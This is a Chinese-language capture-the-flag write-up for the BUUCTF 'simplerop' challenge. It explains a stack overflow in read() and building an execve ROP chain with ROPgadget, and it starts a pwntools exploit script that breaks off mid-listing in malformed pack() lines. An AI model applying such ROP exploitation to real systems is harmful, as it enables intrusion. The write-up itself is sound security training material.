CMCC--simplerop 题解

文件信息

  该样本是我在做BUUCTF上的题刷到的，该题目本身漏洞明显，利用起来也不算太难，不过在我查阅一下他人的wp后发现了多种解法，在这里做个记录和总结。样本链接：simplerop
  老规矩先来检查一下文件的信息，32位小端程序，且只开启了NX保护。

漏洞定位

程序本身采用的是静态链接，所以用IDA进行分析的时候会发现.text段中的函数特别多，当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。

然后我们在IDA中定位到main函数，可以发现程序十分简单，read函数造成了栈溢出，而且提示到位使用ROP进行漏洞利用。

利用分析

由于漏洞比较明显，没有后门函数可以利用，且并没有暴露出system函数，加上题目的提示，所以这里采用构造ROP链的方式进行攻击。构造ROP链进行攻击时，可以采取泄露出libc地址，ret2libc的方式，这里我并没有使用这种方式，而是使用了其它三种方法，有兴趣的读者可以再试试ret2libc的方法。

wp

第一种方法：
  ROP链实现execve系统调用，这里我们可以借助ROPgadget工具自动生成ropchain，命令行如下：ROPgadget --binary simplerop --ropchain，不过该方法生成的ropchain太长，read函数有限制无法全部读取，所以需要对生成的ropchain链进行改造。具体wp如下：

from pwn import *

io = process("./simplerop")
# remote环境可以在BUUCTF上找到
# io = remote("node3.buuoj.cn", 27111)

from struct import pack

# Padding goes here
p = cyclic(0x14+0x4+0x8)     # 动态调试得到，IDA显示的不对
p += pack(b', 0x0806e82a) # pop edx ; ret
p += pack(b', 0x080ea060) # @ .data
p += pack(b'